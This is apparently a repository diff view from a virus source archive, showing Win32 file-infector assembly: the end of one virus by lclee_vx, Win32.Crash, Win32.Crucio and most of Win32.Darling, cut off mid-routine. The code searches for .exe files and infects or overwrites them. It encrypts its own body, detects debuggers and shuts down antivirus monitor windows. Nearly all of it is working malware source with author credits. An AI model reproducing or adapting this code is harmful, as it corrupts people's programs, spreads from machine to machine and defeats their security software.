add esi, ebp
mov ah, byte ptr [ebp+offset CryptKey]
mov ecx, CryptEnd-CryptStart
CryptLoop:
xor byte ptr [esi], ah
inc esi
loop CryptLoop
ret
;-------------------------------------------------------------------------------
;Pop up message
;-------------------------------------------------------------------------------
FirstGeneration:
push 0
push offset szTopic
push offset szText
push 0
mov eax, dword ptr [ebp+offset aMessageBoxA]
call eax
push 0
mov eax, dword ptr [ebp+offset aExitProcess]
call eax
;-----------------------------------------------------------------------------
;APIs function needed.
;-----------------------------------------------------------------------------
sMessageBoxA db "MessageBoxA", 0
aMessageBoxA dd 00000000h
@@Namez label byte
sGetProcAddress db "GetProcAddress", 0
sLoadLibraryA db "LoadLibraryA", 0
sExitProcess db "ExitProcess", 0
sGetWindowsDirectoryA db "GetWindowsDirectoryA", 0
sGetSystemDirectoryA db "GetSystemDirectoryA", 0
sGetCurrentDirectoryA db "GetCurrentDirectoryA", 0
sSetCurrentDirectoryA db "SetCurrentDirectoryA", 0
sFindFirstFileA db "FindFirstFileA", 0
sFindNextFileA db "FindNextFileA", 0
sFindClose db "FindClose", 0
sGlobalAlloc db "GlobalAlloc", 0
sGlobalFree db "GlobalFree", 0
sGetFileAttributesA db "GetFileAttributesA", 0
sSetFileAttributesA db "SetFileAttributesA", 0
sCreatFileA db "CreateFileA", 0
sReadFile db "ReadFile", 0
sWriteFile db "WriteFile", 0
sGetFileTime db "GetFileTime",0
sGetFileSize db "GetFileSize", 0
sCreateFileMapping db "CreateFileMapping", 0
sMapViewOfFile db "MapViewOfFile", 0
sUnmapViewOfFile db "UnmapViewOfFile", 0
sCloseHandle db "CloseHandle", 0
sSetFileTime db "SetFileTime", 0
sSetFilePointer db "SetFilePointer", 0
sSetEndOfFile db "SetEndOfFile", 0
db 0FFh
@@Offsetz label byte
aGetProcAddress dd 00000000h
aLoadLibraryA dd 00000000h
aExitProcess dd 00000000h
aGetWindowsDirectoryA dd 00000000h
aGetSystemDirectoryA dd 00000000h
aGetCurrentDirectoryA dd 00000000h
aSetCurrentDirectoryA dd 00000000h
aFindFirstFileA dd 00000000h
aFindNextFileA dd 00000000h
aFindClose dd 00000000h
aGlobalAlloc dd 00000000h
aGlobalFree dd 00000000h
aGetFileAttributesA dd 00000000h
aSetFileAttributesA dd 00000000h
aCreateFileA dd 00000000h
aReadFile dd 00000000h
aWriteFile dd 00000000h
aGetFileTime dd 00000000h
aGetFileSize dd 00000000h
aCreateFileMapping dd 00000000h
aMapViewOfFile dd 00000000h
aUnmapViewOfFile dd 00000000h
aCloseHandle dd 00000000h
aSetFileTime dd 00000000h
aSetFilePointer dd 00000000h
aSetEndOfFile dd 00000000h
;------------------------------------------------------------------------------
;Parameters
;------------------------------------------------------------------------------
aKernel32 dd 00000000h
Counter dd 00000000h
SearchHandle dd 00000000h
FileHandle dd 00000000h
FilePointer dd 00000000h
OriginalFileTime dd 00000000h
MapSize dd 00000000h
FileAttribute dd 00000000h
MemoryHandle dd 00000000h
MapAddress dd 00000000h
OldRawSize dd 00000000h
NewRawSize dd 00000000h
NewFileSize dd 00000000h
PEHeader dd 00000000h
FileAlign dd 00000000h
IncreaseRaw dd 00000000h
InfectFlag dd 00000000h
OriFileSize dd 00000000h
AppBase dd 00400000h
ByteRead dd ?
User32Dll db "User32.dll", 0 ;User32.dll
WindowsDir db 128h dup (0)
SystemDir db 128h dup (0)
Mark db "*.exe", 0 ;target file *.exe
RedundantSize equ (offset delta - offset VirusStart)
total_size equ (offset VirusEnd - offset VirusStart)
szTopic db "F-13 Labs", 0
szText db "Author:lclee_vx", 0
max_path equ 260
MinimumFileSize equ 1024d
filetime STRUC ;file time structure
FT_dwLowDateTime DD ?
FT_dwHighDateTime DD ?
filetime ENDS
win32_find_data STRUC
FileAttributes DD ? ; attributes
CreationTime filetime ? ; time of creation
LastAccessTime filetime ? ; last access time
LastWriteTime filetime ? ; last modificationm
FileSizeHigh DD ? ; filesize
FileSizeLow DD ? ; -"-
Reserved0 DD ? ;
Reserved1 DD ? ;
FileName DB max_path DUP (?) ; long filename
AlternateFileName DB 13 DUP (?) ; short filename
DB 3 DUP (?) ; dword padding
win32_find_data ENDS ;
;
Win32FindData win32_find_data ? ; our search area
CryptKey db ?
VirusEnd:
ends
end VirusStart
Win32/Infector/Win32.Cocaine.asm
+5767
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.CodeHopper.Queen.b.7z
BIN
View File
Binary file not shown.
Win32/Infector/Win32.Crash.asm
+224
View File
@@ -0,0 +1,224 @@
comment *
Name: Crash OverWrite :-)
Coder: BeLiAL
Type: Companion
Anything else: NO
This is my first win32 virus.Its only a
companionvirus but it does his work very
well.Its perhaps coded not so fine but
im sure nobody will care.It infects all
files in the directory and renames
the victimfile to .dat .Perhaps i will make
infecting more files...
Its without payload and any weapons :)
It Doesnt infect dos-files correctly.
Greetings to the whole #vx channel on undernet
BeLiAL
*
.386
.model flat
Locals
Jumps
Extrn FindFirstFileA :PROC
Extrn FindNextFileA :PROC
Extrn CreateFileA :PROC
Extrn WriteFile :PROC
Extrn ReadFile :PROC
Extrn GlobalAlloc :PROC
Extrn GlobalFree :PROC
Extrn ExitProcess :PROC
Extrn WinExec :PROC
Extrn CopyFileA :PROC
Extrn CloseHandle :PROC
Extrn SetFilePointer :PROC
Extrn GetFileSize :PROC
.data
MAX_PATH EQU 0ffh
FALSE EQU 0
changeoffset EQU 094fh
winsize EQU 01h
FILETIME struct
dwLowDateTime DWORD ?
dwHighDateTime DWORD ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ?
ftCreationTime FILETIME <>
ftLastAccessTime FILETIME <>
ftLastWriteTime FILETIME <>
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE MAX_PATH dup(?)
cAlternate BYTE 0eh dup(?)
ends
FindFileData WIN32_FIND_DATA <>
memptr dd 0
counter1 dd 0
filehandle dd 0
filesize dd 00001000h
exefile db '*.exe',0
myname db 'crashoverwrite.exe',0
dd 0
dd 0
secbuffer dd 0
dd 0
dd 0
searchhandle dd 0
db '[Crash OverWrite] coded by BeLiAL'
.code
start:
push offset FindFileData
push offset exefile
call FindFirstFileA
mov searchhandle,eax
already_infected:
mov eax,dword ptr nFileSizeLow.FindFileData
cmp eax,00001000h
je find_next_victim
mov eax,offset cFileName.FindFileData
jmp find_dot1
find_next_victim:
push offset FindFileData
push searchhandle
call FindNextFileA
test eax,eax
jz reanimate
jmp already_infected
find_dot1:
cmp byte ptr ds:[eax],'.'
je next_step1
add eax,1
jmp find_dot1
next_step1:
add eax,1
push eax
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
mov ebx,offset cFileName.FindFileData
mov eax,offset secbuffer
find_dot2:
mov dh,byte ptr ds:[ebx]
cmp edx,0
je next_step2
mov byte ptr ds:[eax],dh
add ebx,1
add eax,1
jmp find_dot2
next_step2:
pop eax
push FALSE
push offset secbuffer
mov byte ptr ds:[eax],'e'
add eax,1
mov byte ptr ds:[eax],'x'
add eax,1
mov byte ptr ds:[eax],'e'
push offset cFileName.FindFileData
call CopyFileA
push FALSE
push offset cFileName.FindFileData
push offset myname
call CopyFileA
open_victim:
push 0
push 080h
push 3h
push 0h
push 0h
push 0c0000000h
push offset FindFileData.cFileName
Call CreateFileA
mov filehandle,eax
cmp eax,0ffffffffh
je find_next_victim
getmemory:
push filesize
push 0
Call GlobalAlloc ;get the memory
mov edx,eax
cmp eax,0
je close_file
push edx
copyinmemory:
push 0
push offset counter1
push filesize
push edx
push filehandle
Call ReadFile
pop edx
mov dword ptr memptr,edx ;for later use
add edx,changeoffset
mov eax,offset cFileName.FindFileData
modify_victim:
mov bh,byte ptr ds:[eax]
mov byte ptr ds:[edx],bh
cmp bh,0
je set_pointer
add eax,1
add edx,1
jmp modify_victim
set_pointer:
push 0
push 0
push 0
push filehandle
call SetFilePointer
copy_to_file:
push 0
push offset counter1
push filesize
push memptr
push filehandle
call WriteFile
close_file:
push filehandle
call CloseHandle
jmp find_next_victim
reanimate:
mov eax,offset myname
find_dot3:
mov bx,word ptr ds:[eax]
cmp bx,'e.'
je next_step3
cmp bx,'E.'
je next_step3
add eax,1
jmp find_dot3
next_step3:
add eax,1
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
add eax,1
mov byte ptr ds:[eax],00h
that_was_all:
push winsize
push offset myname
call WinExec
final:
push 0
call ExitProcess
ends
end start
Win32/Infector/Win32.Crucio.asm
+729
View File
@@ -0,0 +1,729 @@
; ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²
; ccc rrrr u u ccc i oo
; c r r u u c i o o
; c r r u u c i o o
; c r r u u c i o o
; c rrrr u u c i o o
; c r r u u c i o o
; c r r u u c i o o
; ccc r r uu ccc i oo
; ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²
;Win32.Crucio by powerdryv = Surya
;This was my very 1st of the viruses.Now, since I wanted to contribute
;to 29A,I value-added to this virus. The virus now is encrypted with a
;simple Sliding Key Alogo.,(XOR being the operation). For each dword
;being encrypted the Key increases by 4.After the XOR operation is per-
;formed the dword gets again encrypted thru FPU instuction.The algo.
;used for encryption is simple.In 1st step the dword get squared, then
;its added to itself and again it gets squared.So u see the simplicity.
; Anti-Emulation : Yes, again using FPI
; Anti-AV : Shuts down AV monitors
; PayLoad : On every 25th of month shows a message box
; Resident : No
; Poly : No
; Sets up SEH frams, (well that's a necessity)
.586
.587
.model flat
jumps
extrn ExitProcess:proc
extrn MessageBoxA:proc
SizeOfVirus equ (offset EndOfVirus-StartOfVirus)/4
EncodedVirus equ (EEndOfVirus-EStartOfVirus)/4
SizeOne equ (StartOfVirus-EStartOfVirus)/4
.data
szTitle db "Win32.Crucio by Surya",0
Message db "In every color there's the light",13
db "In every stone sleeps a crystal",13
db "Remember the Shaman when he used to say:",13
db "Man is the dream of the dolphin.",0
SoftIce9x db "\\.\SICE",0
SoftIceNT db "\\.\NTSICE",0
.code
StartOfVirus label byte
Start: call Delta
Delta: fnop
pop ebp
mov eax, offset Delta
fild [ebp]
fild [eax]
fsub
fabs
fnop
fistp dword ptr [Impy]
mov ebp, Impy
call CheckDebggers
mov ecx, EncodedVirus
lea edi, [ebp+EStartOfVirus]
call Decoder
jmp RealStart
Impy dd 0
RealStart:
EStartOfVirus label byte
mov esi, [esp]
and esi, 0FFFF0000h
mov ecx, 5
Check4MZ:
sub esi, 10000h
cmp word ptr [esi], "ZM"
je Check4PE
loop Check4MZ
mov ecx, cs
xor cl, cl
jecxz WinNT
mov esi, 0BFF70000h
jmp Check4PE
WinNT:
mov esi, 077F00000h
Check4PE: cmp dword ptr [esi+80h], 'EP'
jne Check4MZ
mov dword ptr [ebp+@Kernel@], esi
xchg eax, esi
call SetSEH
mov esp, [esp+8h]
jmp ResSEH
SetSEH:
push dword ptr fs:[0]
mov fs:[0], esp
@1: lea edi, [ebp+ApiOffsets]
lea esi, [ebp+ApiNames]
call GetApi
call CloseAV
CheckDebggers2:
push 0
push 80h
push 3h
push 0h
push 1h
push 0C0000000h
push offset SoftIce9x
call [ebp+@CreateFileA@]
inc eax
jnz Detected
dec eax
push 0
push 80h
push 3h
push 0h
push 1h
push 0C0000000h
push offset SoftIceNT
call [ebp+@CreateFileA@]
inc eax
jnz Detected
dec eax
PayLoad:
lea eax, [ebp+Samay]
push eax
call [ebp+@GetSystemTime@]
cmp word ptr [ebp+S_wDay], 25h
je Detected
call MainInfection1
call MainInfection2
ResSEH:
pop dword ptr fs:[0]
push 0
call ExitProcess
MainInfection1:
push 128
lea eax, [ebp+offset windir]
push eax
mov eax, [ebp+offset @GetWindowsDirectoryA@]
call eax
push 128
lea eax, [ebp+offset sysdir]
push eax
mov eax, [ebp+offset @GetSystemDirectoryA@]
call eax
Return: ret
MainInfection2:
@3: lea eax, [ebp+windir]
push eax
call [ebp+@SetCurrentDirectoryA@]
call FindThem
jmp ResSEH
lea eax, [ebp+sysdir]
push eax
call [ebp+@SetCurrentDirectoryA@]
call FindThem
jmp ResSEH
FindThem proc
lea eax, [ebp+Win32_Find_Data]
push eax
lea eax, [ebp+EXEtension]
push eax
call [ebp+@FindFirstFileA@]
inc eax
jz Failed2Find
dec eax
mov dword ptr [ebp+SearchHandle], eax
@@1:
push dword ptr [ebp+OldEIP]
push dword ptr [ebp+NewBase]
call InfectThem
pop dword ptr [ebp+NewBase]
push dword ptr [ebp+OldEIP]
@@2:
lea edi, [ebp+Win32_Find_Data]
mov ecx, MAX_PATH
xor al, al
rep stosb
lea eax, [ebp+Win32_Find_Data]
push eax
push dword ptr [ebp+EXEtension]
call [ebp+@FindNextFileA@]
test eax, eax
jz Failed2Find
jmp @@1
@@3:
push dword ptr [ebp+SearchHandle]
call [ebp+@FindClose@]
Failed2Find: ret
FindThem endp
GetApi proc
@_1: push esi
push edi
call GetTheApis
pop edi
pop esi
stosd
xchg edi, esi
xor al, al
@_2: scasb
jnz @_2
xchg edi, esi
@_3: cmp byte ptr [esi], 0BBh
je Return2
jmp @_1
Return2: ret
GetApi endp
GetTheApis proc
mov edx, esi
mov edi, esi
xor al, al
@@_1: scasb
jnz @@_1
sub edi, esi
mov ecx, edi
xor eax, eax
mov word ptr [ebp+Counter], ax
mov esi, [ebp+@Kernel@]
add esi, 3ch
lodsw
add eax, [ebp+@Kernel@]
mov esi, [eax+78h]
add esi, 1ch
add esi, [ebp+@Kernel@]
lodsd
add eax, [ebp+@Kernel@]
mov dword ptr [ebp+@AddyTable@], eax
lodsd
add eax, [ebp+@Kernel@]
push eax
lodsd
add eax, [ebp+@Kernel@]
mov dword ptr [ebp+@OrdinalTable@], eax
pop esi
xor ebx,ebx
@@_2: push esi
lodsd
add eax, [ebp+@Kernel@]
mov esi, eax
mov edi, edx
push ecx
cld
rep cmpsb
pop ecx
jz @@_3
pop esi
add esi, 4
inc ebx
inc word ptr [ebp+Counter]
jmp @@_2
@@_3: pop esi
movzx eax, word ptr [ebp+Counter]
shl eax, 1
add eax, dword ptr [ebp+@OrdinalTable@]
xor esi, esi
xchg eax, esi
lodsw
shl eax, 2
add eax, dword ptr [ebp+@AddyTable@]
mov esi, eax
lodsd
add eax, [ebp+@Kernel@]
ret
GetTheApis endp
InfectThem proc
lea eax, [ebp+WFD_szFileName]
push 80h
push eax
call [ebp+@SetFileAttributesA@]
call OpenIt
inc eax
jz Failed2Open
dec eax
mov [ebp+FileHandle], eax ;dword ptr
mov ecx, [ebp+WFD_nFileSizeLow]
call CreateMapOfIt
test eax, eax
jz CantMap ;to Close the file
mov [ebp+MapHandle], eax
call MapIt
test eax, eax
jz UnmapIt
mov [ebp+MapAddy], eax
mov esi, [eax+3ch]
add esi, eax
cmp dword ptr [esi], 'EP'
jne LeaveIt
cmp dword ptr [esi+4ch], 'aea' ;Gaea
jne LeaveIt
push dword ptr [esi+3ch]
push dword ptr [ebp+MapAddy]
call [ebp+@CloseHandle@]
pop ecx
mov eax, [ebp+WFD_nFileSizeLow]
add eax, SizeOfVirus
call AlignIt
xchg ecx, eax
call CreateMapOfIt
test eax, eax
jz CantMap ;to Close the file
mov [ebp+MapHandle], eax
mov ecx, [ebp+NewSize]
call MapIt
test eax, eax
jz UnmapIt
mov [ebp+MapAddy], eax
mov esi, [eax+3ch]
add esi, eax
mov [ebp+PEHeader], esi
xor eax, eax
mov ax, word ptr [esi+6ch] ;
dec eax
imul eax, eax, 28h
add esi, 78h
add esi, eax
mov ebx, [ebp+PEHeader+74h]
shl ebx, 3
add esi, ebx
mov eax, [ebp+PEHeader+28h]
mov [ebp+OldEIP], eax ;dword ptr
mov eax, [ebp+PEHeader+34h]
mov [ebp+NewBase], eax ;dword ptr
mov ebx, [esi+10h]
mov edx, ebx
mov ebx, [esi+14h]
push ebx
mov edi, [ebp+PEHeader]
mov eax, edx
add eax, [esi+0ch]
mov [edi+28h], eax
mov dword ptr [ebp+NewEIP], eax
mov eax, [esi+10h]
add eax, SizeOfVirus
mov ecx, [edi+3ch]
call AlignIt
mov [esi+10h], eax
mov [esi+08h], eax
pop ebx
mov eax, [esi+10ch]
add eax, [esi+0ch]
mov [edi+50h], eax
or dword ptr [esi+24h], 0A0000020h
mov dword ptr [edi+4ch], 'aea'
lea esi, [ebp+Start]
mov edi, ebx
add edi, dword ptr [ebp+MapAddy]
mov ecx, SizeOne
rep movsd
mov ecx, EncodedVirus
lea esi, [ebp+RealStart]
call RandomNo
mov [ebp+EncKey], eax
finit
Loop1: xor esi, [ebp+EncKey]
add [ebp+EncKey], 4h
fild dword ptr [esi]
fild dword ptr [esi]
fmul
fadd st, st
fistp dword ptr [ebx]
fild dword ptr [ebx]
fild dword ptr [ebx]
fmul
fistp dword ptr [esi]
movsd
add esi, 4h
loop Loop1
lea esi, [ebp+Decoder]
mov ecx, (Ending-Decoder)/4
Loop3:
movsd
add esi, 4h
loop Loop3
jmp UnmapIt
LeaveIt:
call TruncateIt
UnmapIt:
push dword ptr [ebp+MapAddy]
call [ebp+@UnmapViewOfFile@]
push dword ptr [ebp+MapHandle]
call [ebp+@CloseHandle@]
CantMap:
push dword ptr [ebp+FileHandle]
call [ebp+@CloseHandle@]
jmp ResSEH
Detected:
push 0
push offset szTitle
push offset Message
push 00h
call MessageBoxA
push 0
call ExitProcess
Failed2Open:
push dword ptr [ebp+WFD_dwFileAttributes]
lea eax, [ebp+WFD_szFileName]
push eax
call [ebp+@SetFileAttributesA@]
ret
InfectThem endp
AlignIt proc
push ebx
xor ebx, ebx
push eax
div ecx
pop eax
sub ecx, ebx
add eax, ecx
pop ebx
ret
AlignIt endp
CreateMapOfIt proc
push 0
push ecx
push 0
push 4h
push dword ptr [ebp+FileHandle]
call [ebp+@CreateFileMappingA@]
ret
CreateMapOfIt endp
MapIt proc
push ecx
push 0
push 0
push 2h
push dword ptr [ebp+MapHandle]
call [ebp+@MapViewOfFile@]
ret
MapIt endp
OpenIt proc
push 0
push 0
push 3h
push 0
push 1h
push 80000000h or 40000000h
push eax
call [ebp+@CreateFileA@]
ret
OpenIt endp
TruncateIt proc
push 0
push 0
push ecx
push dword ptr [ebp+FileHandle]
call [ebp+@SetFilePointer@]
push dword ptr [ebp+FileHandle]
call [ebp+@SetEndOfFile@]
ret
TruncateIt endp
RandomNo proc
db 0fh, 31h
mov [ebp+Ran0], eax
call [ebp+@GetTickCount@]
mov [ebp+Ran1], eax
call [ebp+@GetTickCount@]
mov [ebp+Ran2], eax
call [ebp+@GetTickCount@]
mov [ebp+Ran3], eax
add eax, [ebp+Ran1]
call ClDoer
ror eax, cl
add eax, [ebp+Ran0]
shl eax, 7h
call ClDoer
rol eax, cl
add eax, [ebp+Ran2]
sub eax, [ebp+Ran3]
call ClDoer
ror eax, cl
mov [ebp+EncKey], eax
ret
ClDoer proc near
in al, 40h
mov cl, al
ret
ClDoer endp
RandomNo endp
CloseAV proc
lea eax, [ebp+AVList]
Loop2:
call CloseAVs
xor al, al
scasb
jnz $-1
cmp byte ptr [edi], 0BBh
jnz Loop2
ret
CloseAV endp
CloseAVs proc
push edi
push 0
call [ebp+@FindWindowA@]
test eax, eax
jz Return3
push 0
push 0
push 12h
push eax
call [ebp+@PostMessageA@]
xor cl, cl
org $-1
Return3:
ret
CloseAVs endp
db "I inspire.....",0
ApiNames label byte
@FindFirstFileA db "FindFirstFileA",0
@FindNextFileA db "FindNextFileA",0
@FindClose db "FindClose",0
@CreateFileA db "CreateFileA",0
@SetFilePointer db "SetFilePointer",0
@SetFileAttributesA db "SetFileAttributesA",0
@CloseHandle db "CloseHandle",0
@GetCurrentDirectoryA db "GetCurrentDirectoryA",0
@SetCurrentDirectoryA db "SetCurrentDirectoryA",0
@GetWindowsDirectoryA db "GetWindowsDirectoryA",0
@GetSystemDirectoryA db "GetSystemDirectoryA",0
@CreateFileMappingA db "CreateFileMappingA",0
@MapViewOfFile db "MapViewOfFile",0
@UnmapViewOfFile db "UnmapViewOfFile",0
@SetEndOfFile db "SetEndOfFile",0
@GetTickCount db "GetTickCount",0
@GetSystemTime db "GetSystemTime",0
@FindWindowA db "FindWindowA",0
@PostMessageA db "PostMessageA",0
db 0BBh
AVList label byte
db "AVP Monitor",0
db "Amon Antivirus Monitor",0
db "McAfee Scan",0
db 0BBh
EXEtension db '*.exe',0
@Kernel@ dd 00000000h
EncKey dd 00000000h
@Start@ dd 00000000h
@AddyTable@ dd 00000000h
@OrdinalTable@ dd 00000000h
FileHandle dd 00000000h
SearchHandle dd 00000000h
MapHandle dd 00000000h
MapAddy dd 00000000h
PEHeader dd 00000000h
NewEIP dd 00000000h
NewSize dd 00000000h
Counter dw 0000h
ApiOffsets label byte
@FindFirstFileA@ dd 0
@FindNextFileA@ dd 0
@FindClose@ dd 0
@CreateFileA@ dd 0
@SetFilePointer@ dd 0
@SetFileAttributesA@ dd 0
@CloseHandle@ dd 0
@GetCurrentDirectoryA@ dd 0
@SetCurrentDirectoryA@ dd 0
@GetWindowsDirectoryA@ dd 0
@GetSystemDirectoryA@ dd 0
@CreateFileMappingA@ dd 0
@MapViewOfFile@ dd 0
@UnmapViewOfFile@ dd 0
@SetEndOfFile@ dd 0
@GetTickCount@ dd 0
@GetSystemTime@ dd 0
@FindWindowA@ dd 0
@PostMessageA@ dd 0
Ran1 dd 0
Ran2 dd 0
Ran0 dd 0
Ran3 dd 0
MAX_PATH equ 260
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
Win32_Find_Data label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db MAX_PATH dup (?)
WFD_szAlternateFileName db 13 dup (?)
db 03 dup (?)
Samay label byte
S_wYear dw ?
S_wMonth dw ?
S_wDayOfWeek dw ?
S_wDay dw ?
S_wHour dw ?
S_wMinute dw ?
S_wSecond dw ?
S_wMilliseconds dw ?
sysdir db 128h dup(0)
windir db 128h dup(0)
curdir db 128h dup(0)
OldEIP dd 0
NewBase dd 0
EEndOfVirus label byte
Decoder proc
test ebp, ebp
jz EndDecod
mov eax, dword [ebp+EncKey]
mov ebx, 2h
finit
Looploopy:
mov edx, dword ptr [edi]
fild dword ptr [edx]
fsqrt
fistp dword ptr [Var1]
fild dword ptr [ebx]
fild dword ptr [Var1]
fdiv
fsqrt
xor edx, eax
add eax, 4h
mov dword ptr [edi], edx
add edi, 4
loop Looploopy
EndDecod: ret
CheckDebggers:
mov ecx, fs:[20h]
jecxz EndDecod
mov dword ptr [ebp+EncKey], -1
ret
Decoder endp
Var1 dd 0
EndOfVirus label byte
Ending: end Start
; I inspire....
Win32/Infector/Win32.Crypto.asm
+8659
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.DDoS.asm
+2363
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Darling.asm
+944
View File
@@ -0,0 +1,944 @@
;============================================================================
;
;
; NAME: Win32.Darling v1.00
; TYPE: Direct-action variable-encrypting PE-infector.
; SIZE: Around 1700 bytes.
; AUTHOR: T-2000 / [Immortal Riot].
; E-MAIL: T2000_@hotmail.com
; DATE: May 1999.
; PAYLOAD: Randomly pops-up a message-box.
;
;
; FEATURES:
;
; - True Win32-compatible (Win-95/98/NT).
; - Variable encrypting (32-bit key).
; - Traps possible errors with a SEH.
; - Infects files in current/windoze/system-directory.
; - Non-destructive payload (ARGHHH!!!!!).
;
;
; Nothing brand new at all, this is just a quick Win32.Savior hack, with
; some improvements. Now it fetches API from KERNEL32.DLL's export-table,
; so it doesn't have to rely on the host's imports anymore...
;
; Succesfully tested on Win95 (OSR/2), Win98, and WinNT (4.0).
;
;
; KNOWN PROBLEMS:
;
; For some reason my infected dummy-files start executing wrongly decrypted
; code, this only happens when a small file is executed two times in a row,
; under NT. It doesn't look like a bug of mine, I suspect the caching is
; fucking things up.
;
;
; Assemble with: TASM32 SAVIOR.ASM /m /ml
; TLINK32 SAVIOR.OBJ IMPORT32.LIB
; PEWRSEC SAVIOR.EXE
;
;============================================================================
.386p
.MODEL FLAT
.CODE
ORG 0
EXTRN ExitProcess:PROC ; Only used by the carrier.
Debug_Mode = 1 ; If true, only DUM?.* files are
; targetted for infection.
Virus_Size EQU (Virus_End-START)
Virus_Size_Mem EQU (Virus_End_Mem-START)
Max_Infect EQU 4
Min_Size_Infect EQU 4096
START:
push eax
lidt [esp-2]
pop eax
jmp Carrier
PUSH ESP ; Reserve room for EIP.
PUSHFD ; Save registers & flags.
PUSHAD
CALL Get_Delta ; Get our location in memory.
Anti_Moron DB 0E9h ; Overlapping code, anti BP.
Get_Delta: POP EBP
SUB EBP, (Anti_Moron-START)
MOV EAX, 0
Init_Key = DWORD PTR $-4
MOV EBX, 0
Init_Slide = DWORD PTR $-4
MOV ECX, (Virus_End-Encrypted) / 4
PUSH EBP
Decrypt_DWORD: XOR [EBP+(Virus_Size-4)], EAX
SUB EBP, 4
ADD EAX, EBX ; Slide decryption-key.
RCL EBX, 3 ; Slide key-slider.
LOOP Decrypt_DWORD
POP EBP
IF (($-START) MOD 4) GT 0
DB (4 - (($-START) MOD 4)) DUP(90h)
ENDIF
Encrypted: MOV EAX, EBP
SUB EAX, 1000h ; Calculate image-base.
Base_Displ = DWORD PTR $-4
LEA EBX, [EAX+((Carrier-START)+1000h)]
Old_EIP_RVA = DWORD PTR $-4
MOV [ESP+(9*4)], EBX ; Set address host in stack.
CALL Setup_SEH ; PUSH SEH-address on stack.
MOV ESP, [ESP+(2*4)] ; Restore original stack.
JMP Restore_SEH ; Terminate program-flow.
Setup_SEH: PUSH DWORD PTR FS:[ECX] ; Save original SEH-pointer.
; MOV FS:[ECX], ESP ; Set our own SEH.
CLD
MOV EAX, [ESP+(12*4)]
XOR AX, AX
Find_K32_Base: CMP EAX, 400000h ; Below application-memory?
JB JMP_Rest_SEH ; ARGHH! Not found!
CMP [EAX.EXE_Mark], 'ZM'
JNE Scan_Downwards
CMP [EAX.Reloc_Table], 40h
JB Scan_Downwards
MOV EBX, [EAX+3Ch]
ADD EBX, EAX
CMP [EBX.PE_Mark], 'EP'
JNE Scan_Downwards
MOV EBX, [EBX+120] ; K32's export-table.
ADD EBX, EAX
MOV ESI, [EBX+(3*4)] ; ASCIIZ-name of DLL.
ADD ESI, EAX
PUSH EAX
LODSD
CALL Upcase_EAX
XCHG ECX, EAX
LODSD
CALL Upcase_EAX
CMP EAX, '23LE' ; Check for KERNEL32.DLL.
POP EAX
JNE Scan_Downwards
CMP ECX, 'NREK' ; Found KERNEL32.DLL ?
JE Found_K32_Base
Scan_Downwards: SUB EAX, 65536
JMP Find_K32_Base
Virus_Name DB 'Win32.Darling v1.00', 0
JMP_Rest_SEH: JMP Restore_SEH ; Abort all.
Found_K32_Base: MOV EDX, [EBX+(8*4)] ; Array of name RVA's.
ADD EDX, EAX
MOV ECX, [EBX+(6*4)] ; Amount of name entries.
DEC ECX ; Last entry name.
Find_GPA: MOV EDI, [EDX+(ECX*4)] ; Offset name.
ADD EDI, EAX
PUSHAD
LEA ESI, [EBP+(GetProcAddress_Name-START)]
PUSH 15
POP ECX
REPE CMPSB
POPAD
JNE LOOP_Find_GPA
MOV ESI, [EBX+(9*4)] ; Array of API ordinals.
ADD ESI, EAX
MOVZX ESI, WORD PTR [ESI+(ECX*2)]
MOV EBX, [EBX+(7*4)] ; Array of API RVA's.
ADD EBX, EAX
LEA EBX, [EBX+(ESI*4)]
MOV ESI, [EBX]
ADD ESI, EAX
MOV [EBP+(GetProcAddress-START)], ESI
LOOP_Find_GPA: LOOP Find_GPA
XCHG EBX, EAX
LEA ESI, [EBP+(API_Names-START)]
LEA EDI, [EBP+(API_Addresses-START)]
Loop_Get_API: PUSH ESI
PUSH EBX
CALL [EBP+(GetProcAddress-START)]
CLD ; Store API-address.
STOSD
XCHG ECX, EAX ; API not found?
JECXZ JMP_Rest_SEH
Find_Next_API: LODSB
OR AL, AL ; Found end of API-name?
JNZ Find_Next_API
CMP [ESI], AL ; We've did 'em all?
JNZ Loop_Get_API
LEA ESI, [EBP+(Current_Directory-START)]
MOV EBX, 260
PUSH ESI
PUSH ESI ; Retrieve current path.
PUSH EBX
CALL [EBP+(GetCurrentDirectoryA-START)]
ADD ESI, EBX
PUSH ESI
PUSH EBX ; Retrieve Windoze-directory.
PUSH ESI
CALL [EBP+(GetWindowsDirectoryA-START)]
ADD ESI, EBX
PUSH ESI
PUSH EBX ; Retrieve System-directory.
PUSH ESI
CALL [EBP+(GetSystemDirectoryA-START)]
; Infect files in System-directory.
CALL [EBP+(SetCurrentDirectoryA-START)]
CALL Infect_Directory
; Infect files in Windoze-directory.
CALL [EBP+(SetCurrentDirectoryA-START)]
CALL Infect_Directory
; Infect files in current-directory.
CALL [EBP+(SetCurrentDirectoryA-START)]
CALL Infect_Directory
CALL [EBP+(GetTickCount-START)]
CMP AL, 10
JA Restore_SEH
jmp Restore_SEH
;gall
LEA EAX, [EBP+(USER32_Name-START)]
PUSH EAX
CALL [EBP+(GetModuleHandleA-START)]
XCHG ECX, EAX
JECXZ Restore_SEH
LEA EAX, [EBP+(MessageBoxA_Name-START)]
PUSH EAX
PUSH ECX
CALL [EBP+(GetProcAddress-START)]
OR EAX, EAX
JZ Restore_SEH
XCHG EBX, EAX
; Display an OK/Cancel-box with a message.
Show_Our_Box: PUSH 30h OR 01h
